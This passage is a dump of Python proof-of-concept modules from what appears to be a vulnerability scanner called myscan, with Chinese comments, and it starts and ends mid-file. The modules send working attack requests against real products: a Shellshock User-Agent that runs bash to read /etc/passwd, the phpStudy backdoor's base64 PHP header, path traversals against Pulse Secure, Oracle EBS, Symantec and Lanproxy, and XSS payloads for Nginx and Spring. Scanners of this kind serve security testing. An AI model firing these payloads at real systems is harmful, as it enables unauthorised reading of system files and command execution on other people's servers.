response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/kong/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/kong/poc_kong-cve-2020-11710-unauth_2020.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_kong-cve-2020-11710-unauth_2020.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "kong-cve-2020-11710-unauth" 18 | self.vulmsg = "referer: https://xz.aliyun.com/t/7631" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url, 28 | "timeout": 10, 29 | "allow_redirects": False, 30 | "verify": False, 31 | } 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"kong_env" in r.content: 34 | req["url"] = self.url + "status" 35 | r1 = request(**req) 36 | if r1 != None and r1.status_code == 200 and b"kong_db_cache_miss" in r1.content: 37 | parser_ = response_parser(r1) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": self.url, 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/lanproxy/poc_lanproxy_fileread_2021.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2021/1/8 3 | # @Author : caicai 4 | # @File : poc_lanproxy_fileread_2021.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "lanproxy_fileread" 18 | self.vulmsg = "referer:https://forum.ywhack.com/viewthread.php?tid=114939" 19 | self.level = 3 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "../conf/config.properties", 28 | "timeout": 10, 29 | "allow_redirects": False, 30 | "verify": False, 31 | "quote": False # 新增的参数,path不需要编码,可wireshare抓包看到 32 | 33 | } 34 | r = request(**req) 35 | 36 | if r != None and r.status_code == 200 and "application/octet-stream" in r.headers.get("Content-Type", 37 | "") and b"server.bind" in r.content: 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": req.get("url"), 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/laravel/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/laravel/poc_laravel-debug-info-leak_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/23 3 | # @Author : caicai 4 | # @File : poc_laravel-debug-info-leak_2020.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | from myscan.lib.core.common import get_random_str 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "laravel-debug-info-leak" 19 | self.vulmsg = "referer:https://github.com/nic329/webapp-misconfig-docker/tree/master/laravel/5_debug" 20 | self.level = 1 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | req = { 27 | "method": "POST", 28 | "url": self.url, 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | 35 | if r != None and r.status_code == 405 and b"MethodNotAllowedHttpException" in r.content and b"Environment & details" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": req.get("url"), 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/nexus/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/nginx/poc_nginx-module-vts-xss.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : poc_nginx-module-vts-xss.py 5 | 6 | ''' 7 | 复现: 8 | docker pull gaciaga/nginx-vts:1.11.10-alpine-vts-0.1.12 9 | docker run -P -itd gaciaga/nginx-vts:1.11.10-alpine-vts-0.1.12 10 | 11 | ''' 12 | from myscan.config import scan_set 13 | from myscan.lib.helper.request import request 14 | from myscan.lib.parse.response_parser import response_parser 15 | 16 | 17 | class POC(): 18 | def __init__(self, workdata): 19 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 20 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 21 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 22 | self.name = "nginx-module-vts-xss" 23 | self.vulmsg = '''Nginx virtual host traffic status module XSS''' 24 | self.level = 2 # 0:Low 1:Medium 2:High 25 | 26 | def verify(self): 27 | # 根据config.py 配置的深度,限定一下目录深度 28 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 29 | return 30 | 31 | req = { 32 | "method": "GET", 33 | "url": self.url + "status%3E%3Cscript%3Exxxxxx(31337)%3C%2Fscript%3E", 34 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 35 | "timeout": 10, 36 | "verify": False, 37 | } 38 | 39 | r = request(**req) 40 | if r != None and r.status_code==200 and b'' in r.content and b'nginx vhost traffic status monitor' in r.content: 41 | parser_ = response_parser(r) 42 | self.result.append({ 43 | "name": self.name, 44 | "url": self.url, 45 | "level": self.level, # 0:Low 1:Medium 2:High 46 | "detail": { 47 | "vulmsg": self.vulmsg, 48 | "request": parser_.getrequestraw(), 49 | "response": parser_.getresponseraw() 50 | } 51 | }) -------------------------------------------------------------------------------- /myscan/pocs/perfolder/oracle/oracle_ebs-bispgrapgh-file-read_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/18 3 | # @Author : caicai 4 | # @File : oracle_ebs-bispgrapgh-file-read_2020.py 5 | 6 | ''' 7 | keywords: 8 | "E-Business Home Page" 9 | ''' 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | import re 14 | 15 | 16 | class POC(): 17 | def __init__(self, workdata): 18 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 19 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 20 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 21 | self.name = "ebs-bispgrapgh-file-read" 22 | self.vulmsg = "no detail" 23 | self.level = 2 # 0:Low 1:Medium 2:High 24 | 25 | def verify(self): 26 | # 根据config.py 配置的深度,限定一下目录深度 27 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 28 | return 29 | req = { 30 | "method": "GET", 31 | "url": self.url + "OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/", 32 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 33 | "timeout": 10, 34 | "verify": False, 35 | } 36 | r = request(**req) 37 | if r is not None and r.status_code == 200 and re.search(b"root:[x*]:0:0", r.content): 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": self.url, 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/phpstudy/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/phpstudy/poc_phpstudy_backdoor_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-17 3 | # @Author : caicai 4 | # @File : poc_phpstudy_backdoor_2019.py 5 | import copy 6 | from myscan.config import scan_set 7 | from myscan.lib.helper.request import request 8 | from myscan.lib.parse.response_parser import response_parser 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "phpstudy backdoor" 17 | self.vulmsg = '''Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" 18 | vuln_url: "php_xmlrpc.dll"''' 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 1)) + 2: 24 | return 25 | 26 | request_headers = self.dictdata.get("request").get("headers") 27 | request_headers_forpayload = copy.deepcopy(request_headers) 28 | request_headers_forpayload["Accept-Encoding"] = "gzip,deflate" 29 | request_headers_forpayload["Accept-Charset"] = "cHJpbnRmKG1kNSgzMzMpKTs=" 30 | req = { 31 | "method": "GET", 32 | "url": self.url, 33 | "headers": request_headers_forpayload, # 主要保留cookie等headers 34 | "timeout": 10, 35 | "verify": False, 36 | } 37 | 38 | r = request(**req) 39 | if r and b"310dcbbf4cce62f762a2aaa148d556bd" in r.content: 40 | parse_=response_parser(r) 41 | self.result.append({ 42 | "name": self.name, 43 | "url": self.url, 44 | "level": self.level, # 0:Low 1:Medium 2:High 45 | "detail": { 46 | "vulmsg": self.vulmsg, 47 | "request":parse_.getrequestraw(), 48 | "response":parse_.getresponseraw() 49 | } 50 | }) 51 | 52 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/poc_user-agent-shell-shock_2018.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/18 3 | # @Author : caicai 4 | # @File : poc_user-agent-shell-shock_2018.py 5 | 6 | ''' 7 | 未验证 8 | ''' 9 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 10 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 11 | from myscan.config import scan_set 12 | import re 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "user-agent-shell-shock" 20 | self.vulmsg = "no detail" 21 | self.level = 2 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "cgi-bin/status", 30 | "headers":{'''User-Agent''': '''"() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"'''}, 31 | "timeout": 10, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r is not None and r.status_code == 200 and re.search(b"root:[x*]:0:0", r.content): 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/private/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/25 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/pulsesecure/poc_pulsesecure_sslvpn_cve-2019-11510_2019.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/3 3 | # @Author : caicai 4 | # @File : poc_pulsesecure_sslvpn_cve-2019-11510_2019.py 5 | ''' 6 | fofa: 7 | app="PulseSecure-SSL-VPN" 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | import re 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "pulsesecure_sslvpn_cve-2019-11510" 21 | self.vulmsg = "google it " 22 | self.level = 3 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | 26 | if self.dictdata.get("url").get("protocol") != "https": 27 | return 28 | # 根据config.py 配置的深度,限定一下目录深度 29 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 30 | return 31 | 32 | req = { 33 | "method": "GET", 34 | "url": self.url + "dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/", 35 | "timeout": 10, 36 | "allow_redirects": False, 37 | "verify": False, 38 | } 39 | r = request(**req) 40 | if r != None and r.status_code == 200 and re.search(b"root:[x*]:0", r.content): 41 | parser_ = response_parser(r) 42 | self.result.append({ 43 | "name": self.name, 44 | "url": self.url, 45 | "level": self.level, # 0:Low 1:Medium 2:High 46 | "detail": { 47 | "vulmsg": self.vulmsg, 48 | "request": parser_.getrequestraw(), 49 | "response": parser_.getresponseraw() 50 | } 51 | }) 52 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/qnap/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/rails/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sangfor/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sangfor/poc_sangfor_edr_unauth_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : __template.py 5 | 6 | # 此脚本为编写perfloder的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "sangfor edr unauth" 18 | self.vulmsg = "no detail " 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "ui/login.php?user=admin", 28 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r is not None and r.status_code==302 and "index.php" in r.headers.get("Location","") and b"SANGFOR\xe7\xbb\x88\xe7\xab\xaf\xe6\xa3\x80\xe6\xb5\x8b\xe5\x93\x8d\xe5\xba\x94\xe5\xb9\xb3\xe5\x8f\xb0" in r.content: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": req["url"], 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sap/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sap/poc_sap_cve-2017-12637_2017.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/24 3 | # @Author : caicai 4 | # @File : poc_sap_cve-2017-12637_2017.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "sap_cve-2017-12637" 18 | self.vulmsg = "no detail" 19 | self.level = 3 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..", 28 | "timeout": 10, 29 | "allow_redirects": False, 30 | "verify": False, 31 | } 32 | r = request(**req) 33 | if r is not None and r.status_code == 200 and b"WEB-INF" in r.content and b"META-INF" in r.content: 34 | parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": self.url, 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | "request": parser_.getrequestraw(), 42 | "response": parser_.getresponseraw() 43 | } 44 | }) 45 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/seeyon/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/solr/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sonarqube/poc_sonarqube_api_access.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/10/29 3 | # @Author : caicai 4 | # @File : poc_sonarqube_api_access.py 5 | 6 | 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | from myscan.lib.parse.response_parser import response_parser 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "sonarqube_api_access" 18 | self.vulmsg = "no detail" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "api/settings/values", 29 | "timeout": 10, 30 | "verify": False, 31 | "allow_redirects": False 32 | } 33 | r = request(**req) 34 | if r is not None and r.status_code == 200 and "application/json" in r.headers.get("Content-Type","") and b'''sonar.type''' in r.content: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": parser_.geturl(), 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/spark/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/spring/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/spring/poc_spring_xss_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/1 3 | # @Author : caicai 4 | # @File : poc_spring_xss_2020.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "springboot-xss" 17 | self.vulmsg = "unknown source. " 18 | self.level = 2 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "method": "GET", 26 | "url": self.url + "jolokia/read%3Csvg%20onload=alert(document.cookie)%3E?mimeType=text/html", 27 | "headers": { 28 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169" 29 | }, 30 | "allow_redirects": False, 31 | "timeout": 10, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and b"name 'read' exists" in r.content and "html" in r.headers.get("Content-Type",""): 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": parser_.geturl(), 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/struts/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/supervisord/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/symantec/poc_symantec-messaging-gateway_lfi_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/18 3 | # @Author : caicai 4 | # @File : poc_symantec-messaging-gateway_lfi_2020.py 5 | ''' 6 | fofa 7 | app="Symantec-Messaging-Gateway 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "symantec-messaging-gateway_lfi" 21 | self.vulmsg = "Symantec Messaging Gateway <= 10.6.1 Directory Traversal" 22 | self.level = 2 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | req = { 29 | "method": "GET", 30 | "url": self.url + "brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/", 31 | "timeout": 10, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r is not None and r.status_code == 200 and b"struts-default.xml" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/terramaster/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/12/25 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/thinkcmf/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/thinkcmf/poc_thinkcmf-lfi_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/18 3 | # @Author : caicai 4 | # @File : poc_thinkcmf-lfi_2020.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | 